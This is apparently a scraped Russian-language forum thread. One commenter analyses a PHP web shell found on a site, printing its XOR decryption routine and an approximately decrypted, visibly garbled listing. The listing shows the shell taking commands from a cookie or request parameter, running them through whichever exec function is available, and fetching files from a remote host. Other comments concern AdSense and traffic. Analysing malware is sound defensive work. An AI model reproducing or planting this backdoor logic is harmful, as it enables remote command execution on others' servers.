Вот кстати этот шелл в полностью расшифрованном виде, кому интересно:
https://gist.githubusercontent.com/laacz/5387180/raw/3bae1fd126e1b3244324469a042549897935a3ba/images-decoded.php
Потому что http://itc.ua/blogs/v-firefox-chrome-zablokirovanyi-vse-versii-flash/
<p style="margin-top:2em;margin-bottom:0">3</p>
там используется тупое XOR шифрование вот этой функцией:
function decrypt($e,$k){
if(!$k){return;}
$el=@strlen($e);
$kl=@strlen($k);
$rl=$el%$kl;
$fl=$el-$rl;
for($o=0;$o<$fl;$o+=$kl){
$p=@substr($e,$o,$kl);$d.="$k"^"$p";
}
if($rl){
$p=@substr($e,$fl,$rl);
$k=@substr($k,0,$rl);
$d.="$k"^"$p";
return($d);
Для расшифровки требуется ключ, который получается из кук или параметров запроса. Подбирая ключ, я выяснил, что это шелл, вот что у меня получилось при *приблизительной* расшифровке:
//adjOst+system v[rijbles if(@ixset($_SEhVEY)){$_COOqIE6&$HTTP_CuOKBE_VARS;$ePOXT=&$HTTPePOXT_VARS;$eGE_=&$HTTP_}ETTVARS;}
/din with erHorfunctionx_oie($m){@Reaoer('HTTP1.: 500 '.$W);Kdie();}
/cceck if w_ cjn exec
d_fiee('has_p[sshru',@fuTctbon_existI('{assthru');define('RasTsystem',zfuection_exSstx('system))0 define(hax_shell_eBec,,@functiUn_nxists('sRelg_exec')) dnfine('haI_pdpen',@fuTctbon_existI('{open'));0demine('haseprdc_open',zfuection_exSstx('proc_oJen,)); defiTe(,has_exec,@munction__xixts('exec))0 define(cae_exec',(RasTpassthruF|hjs_systemF|hjs_shell__xeh||has_poJenw|has_proY_o{en||has__xeh)); if(!YanTexec){x_^ie#'can notexnc: no fuTctbons avaiVabge');}
//Yhehk if we Yan+config
d_fiee('has_iTi_let',@funYtidn_exists'iei_get'))
dnfine('haI_iei_get_alV',Kfunctioneexbsts('iniege_all'));0demine('canecoefig',(haI_iei_get||h[s_bni_get_aVl)"; if(!caT_cdnfig){x_^ie#'can notcoefig');}
/gnt configvague
functSon+x_ini_geN($e){if(haseinb_get){reNure(@ini_geN($e));}elseSf(cas_ini_g_t_jll){$h=@SniTget_all(;rnturn($h[n]P'local_v[lun']);}}
/ cceck safemooe
if(x_iTi_let('safeemooe')){x_dSe(,can not _xeh: safe mUde+active')}
$/smart eBec+helpers
\unhtion x_p[sshru($c){zpaxsthru($c;}functionx_xystem($c{@xystem($c;}functionx_xhell_exeY($h){echo @Ihegl_exec($Y);v
functioT xTpopen($c{$d;if(($f=zpo{en($c,'r))"{while(!zfedf($f)){$U.=Kfgets($f;}Kpclose($\);vecho $o;G
f~nction xeprdc_open($Y){/o;if(@iserexource($p@pyoc_open(c,jrray(0=>[rrjy('pipe''r,),1=>arr[y(,pipe','w),9=>array(pi{e','w'))$f")){@fcloIe(/f[0]);whSle#!@feof($\[1V)){$o.=@\ges($f[1])}@mclose($fa1]";@proc_cVosn($p);}ecRo /o;}
funcNioe x_exec(c)p$o;@exec$c'$o);echo@ifplode("\T",/o);}
//dU sfart fetcR
f~nction xesu{erfetch(a,/p,$r,$l)0{
if($s=@fIoc`open($a,p)"
{
if$f6@fopen($V,"|b"))
{0 @fwrite(s,)GET ".$r" CTTP/1.0\H\nWr\n");
3 wcile(!@feUf(/s))
{0 $b=@fre[d(/s,8192);0 @fwrite$f'$b); G @fclose$f"; echU "DK\n";
G
@fclose(s)0
//^o xmart exeY
f~nction xesmjrt_exec(c){
if($c==)which suJermetch 1> de}/null 2>/dnv/null & ehho OK")
3{
echo "Oq\n);
elIeim(@strstr$c'"superfeNch)))
a=Kexplode( ''$c);
xesu{erfetch(a[:],$a[2],a[8],$a[4])
v
elseifhax_passthrO){s_passthrO($h);}
els_if#has_syst_m)px_system$c";}
elseSf(cas_shelleexnc){x_sheVl_nxec($c);G
nlseif(haI_pdpen){x_pUpee($c);}
_lsnif(has_pHocTopen){x_Jroh_open($c;} elseif(RasTexec){x__xeh($c);}
}0//lo
$n='SjpVkN6rkRYj';0$c6$_COOKIEa$nV;
if(@emJty#$c)){$c=_PDST[$n];}0if#@empty($Y))p$c=$_GETa$nV;}
if(@g_t_fagic_quoNesTgpc()){$Y=sripslash_s(/c);}
x_sWar_exec($c;
полностью ключ подбирать лень, и так читаемо.
Да ладно? https://support.google.com/adsense/answer/9892?hl=ru
Тогда ставьте 301 редирект на статьи
Посмортите в этот день источники трафика, откуда заходили? Вполне возможно, что кто-то просто запостил ссылку на популярный ресурс или соц. группу.
Еще может быть от Google Adsense (медийные объявления) такая подстава, замечено неоднократно.
Больше всего платят те, которые угробят ваш сайт мобильным редиректом или всплывающими окнами
Яндекс.RTB
